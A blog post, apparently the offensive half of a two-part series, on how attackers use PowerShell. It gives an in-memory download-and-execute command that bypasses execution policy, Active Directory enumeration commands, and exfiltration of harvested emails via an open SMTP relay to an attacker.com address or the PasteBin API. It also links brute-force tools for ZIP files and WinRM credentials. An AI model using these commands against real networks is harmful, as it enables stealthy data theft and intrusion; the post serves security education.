As we explored in part one, PowerShell can be used for good and bad. We also talked about how monitoring and proper auditing is key. The reason why is that, PowerShell is being used in the wild for malicious activity. As with everything, it has its weaknesses and certain security controls can’t be heavily relied on.
Let’s go through an example. PowerShell has an Execution-Policy which allows you to control and limit the use of scripts. As you can see in the example below, it works as expected when I run the script locally. When I run the script in memory however, it doesn’t get blocked.
This is just a simple example of how attackers can manoeuvre and run PowerShell within your restricted environment despite you have restrictions. This also works for AllSigned, if you’re wondering.
In-memory Network Scanner:
powershell –nop –c “iex(New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/securethelogs/PSpanner/master/PSpanner.ps1’)”
This little technique can do wonders for an attacker. Although cool, in a real-world situation, your AV should be picking these attempts up though.
So, if the AV can stop an attack, the attackers are screwed?
Well no. The AV will pick these scripts and attacks up because the all well known. They run widely known commands which when bundled together forms similar patterns to other variants.
Certain APTs and malicious parties, won’t rely on these scripts as there may be a chance of being spotted. Instead, they go under the radar and run harmless code which returns information that can be manipulated or stolen.
I gave an email command in the Blue team thread:
dsquery user -name * | dsget user -email >> C:\Temp\emails.txt
This can return all your AD users email addresses and output them into a file. This will not be flagged by your AV as it’s a Microsoft module used for Active Directory. Let’s run through a couple more…
Simple commands to pull user information from AD.
- net group “domain admins” /domain
- net group “domain users” /domain
- net group “domain controllers” /domain
- net group “domain computers” /domain
Extraction
There are many ways to extract any information collected.
Mapping an external drive to extract over SMB
A temporary share can be created external which is open on purpose. Once extracted, the share will be removed and server offline.
net use x: \\computer name\sharename /user username password
Sending over email
There are multiple open SMTP relay servers on the internet that allows you to relay email without being authenticated. There are also authenticated SMTP servers which have a free service. Either option provides an extraction method.
Send-MailMessage -From ‘User01 <user01@spoof.com>’ -To ‘User02 <user02@attacker.com>’ -Subject ‘Nothing Unusual’ -Body “See attached” -Attachments .\emails.txt -Priority High -DeliveryNotificationOption OnSuccess, OnFailure -SmtpServer ‘smtp.openserver.com’
Another option which is commonly used is something called PasteBin. PasteBin has it’s own API which allows you to upload data within a POST request. Here is an example:
$Body = @{ api_dev_key = ‘Your Key’
api_paste_code = (“Content”)
api_paste_private = 2
api_paste_name = ‘test.php’
api_option = ‘paste’
api_user_key = ”
};
Invoke-WebRequest -Uri “https://pastebin.com/api/api_post.php” -UseBasicParsing -Body $Body -Method Post
If you were to say, extract sensitive information from a file or AD, you could upload to a burner PasteBin for later extraction. Once the script runs, it gives the URL here to be able to retrieve the information.
If you’ve never heard of PasteBin, check it out. Try and run a simply query on “leaked” and see what comes back. You will most likely find a set of leaked credentials or data.
For example: https://pastebin.com/9xiHKiwv
Using PasteBins API makes life easier. Especially when you can pipe sensitive information into a variable and upload the data using the API. Using commands such as: $extract = Get-content -Path “[Doc location]” and then passing $extract into the $Body = @{…..‘api_paste_code = (“$extract”)’…} section. This can allow you to go under the radar as the file itself hasn’t changed or moved. It won’t also show up in any logs as the .docx file wasn’t uploaded. The content was inside of an array.
PowerShell isn’t just used for post exploitation. It can also be quite useful for other tasks. Over the past week, I’ve created a few scripts which can be used for good or bad. Although the aim was to help other Blue team members, the scripts themselves can always be used on the other side.
Brute Forcing ZIP files
Ok, this will be hard to justify as good however, it was more to answer a question in my mind. This script will allow you to, well, as it says… Brute force password protected zip files: https://securethelogs.com/2020/01/10/psbrutezip-crack-zip-passwords-using-powershell
Brute Force Credentials
https://github.com/securethelogs/WinRM_Brute
By default, the WinRM service is enabled on most Windows machines to allow “remote management”. Although the idea is to make life easier for sysadmins, it also allows a way to remotely execute commands. Because it works with authentication, it can be used to validate users credentials and can therefore be used in a brute force attack.
Powershell OSINT
Several OSINT tools scrap the web for usernames or information related to a users search. Normally these tools are writing in Python however, they can be translated in PowerShell as well. For example:
PowerSosh is a script which allows you to search social media sites for a matching username. This is because the majority of sites will end the URL with …/username. Because of this, we can simply Curl or Invoke a web request to see if the site is live.
This script is more OSINT to find a person but what if we wanted to find exposed resource. Public clouds such as Azure follow a naming convention for the majority of their resource. Because of that, you can somewhat predict how it’s going to end. You only really need to worry about the beginning.
ZorkAzure runs a simple foreach loop to identify any reachable resources on the Azure platform.
Network Scanning
https://github.com/securethelogs/PSpanner
Normally when you think of network scanning, you think NMAP however there is a slight problem with it. Certain AVs count NMAP as a threat and therefore block it. This is where PowerShell can come into play. PSpanner is a simply script which can allow you to do a network scan and query ports.
Remember that these can be ran in memory using the powershell –nop –c “iex(New-Object Net.WebClient).DownloadString(‘’) command. All you need to do useful scripts that you wish to run, and simply add the URL to the command.
Hopefully you can now see that PowerShell works for both teams and understanding both sides of the coin is worth learning. PowerShell can be helpful for day to day automation however, it’s important to realise it can be used against you (Blue Team).
Kali has recently included PowerShell in it’s new build, so if you are running the latest, check it out!
Blue Team Post: https://securethelogs.com/hacking-with-powershell-blue-team/
amoran.io 